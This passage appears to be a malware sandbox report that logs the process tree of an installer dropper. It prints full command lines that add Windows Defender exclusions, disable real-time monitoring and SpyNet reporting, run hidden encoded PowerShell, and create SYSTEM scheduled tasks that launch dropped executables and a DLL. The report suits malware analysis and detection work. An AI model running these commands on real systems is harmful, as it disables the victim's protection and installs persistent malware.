PID 2180 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2180 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2180 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2180 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2180 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2180 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2180 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2180 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2180 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2180 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2180 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2180 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2180 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2180 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2876 wrote to memory of 2684 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2876 wrote to memory of 2684 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2876 wrote to memory of 2684 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2876 wrote to memory of 2684 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2876 wrote to memory of 2684 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2876 wrote to memory of 2684 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2876 wrote to memory of 2684 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3012 wrote to memory of 2420 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3012 wrote to memory of 2420 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3012 wrote to memory of 2420 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3012 wrote to memory of 2420 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3012 wrote to memory of 2420 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3012 wrote to memory of 2420 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3012 wrote to memory of 2420 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 2840 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2684 wrote to memory of 2840 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2684 wrote to memory of 2840 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2684 wrote to memory of 2840 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2684 wrote to memory of 2840 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2684 wrote to memory of 2840 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2684 wrote to memory of 2840 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2420 wrote to memory of 2832 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2420 wrote to memory of 2832 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2420 wrote to memory of 2832 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2420 wrote to memory of 2832 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2420 wrote to memory of 2832 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2420 wrote to memory of 2832 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2420 wrote to memory of 2832 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2684 wrote to memory of 2716 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2684 wrote to memory of 2716 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2684 wrote to memory of 2716 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2684 wrote to memory of 2716 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2684 wrote to memory of 2716 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2684 wrote to memory of 2716 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2684 wrote to memory of 2716 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2420 wrote to memory of 2956 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\PL\setup.exe

"C:\Users\Admin\AppData\Local\Temp\PL\setup.exe"

C:\Users\Admin\AppData\Local\Temp\7zS7C32.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe

.\Install.exe /S /site_id "525403"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gkKMmQgXg" /SC once /ST 00:03:00 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gkKMmQgXg"

C:\Windows\system32\taskeng.exe

taskeng.exe {8FE753B0-39C2-4C39-A5ED-536B633FE5D4} S-1-5-21-2703099537-420551529-3771253338-1000:XECUDNCD\Admin:Interactive:[1]

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gkKMmQgXg"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bJbhxhmwQPPePEjnjA" /SC once /ST 05:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\vWebWLI.exe\" sw /site_id 525403 /S" /V1 /F

C:\Windows\system32\taskeng.exe

taskeng.exe {9103196B-3CC5-4FC9-AF42-89FFB994145D} S-1-5-18:NT AUTHORITY\System:Service:

C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\vWebWLI.exe

C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\vWebWLI.exe sw /site_id 525403 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gzPWurHjf" /SC once /ST 00:52:12 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gzPWurHjf"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gzPWurHjf"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gXCerFuzY" /SC once /ST 01:06:50 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gXCerFuzY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gXCerFuzY"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\cmd.exe

cmd /C copy nul "C:\Windows\Temp\biwNYXhGTKCQxjLv\rKQlJSGa\XdkHnHrtbgVLNEcI.wsf"

C:\Windows\SysWOW64\wscript.exe

wscript "C:\Windows\Temp\biwNYXhGTKCQxjLv\rKQlJSGa\XdkHnHrtbgVLNEcI.wsf"

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YNUWFfCEdUiU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YNUWFfCEdUiU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oWxSecJNU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oWxSecJNU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\eiYaNjTCbhfbMeVB" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\eiYaNjTCbhfbMeVB" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YNUWFfCEdUiU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YNUWFfCEdUiU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oWxSecJNU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oWxSecJNU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\eiYaNjTCbhfbMeVB" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\eiYaNjTCbhfbMeVB" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gdKDdoLpI" /SC once /ST 02:03:12 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gdKDdoLpI"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gdKDdoLpI"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "FTlmQXMDCFpnewAuq" /SC once /ST 04:01:10 /RU "SYSTEM" /TR "\"C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe\" VS /site_id 525403 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "FTlmQXMDCFpnewAuq"

C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe

C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe VS /site_id 525403 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bJbhxhmwQPPePEjnjA"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\oWxSecJNU\AOatCp.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "zeLHdclAQOoTZxj" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "zeLHdclAQOoTZxj2" /F /xml "C:\Program Files (x86)\oWxSecJNU\rzgGdAH.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "zeLHdclAQOoTZxj"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "zeLHdclAQOoTZxj"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "KJMKKiIztyaoEB" /F /xml "C:\Program Files (x86)\YNUWFfCEdUiU2\ioOgwSz.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

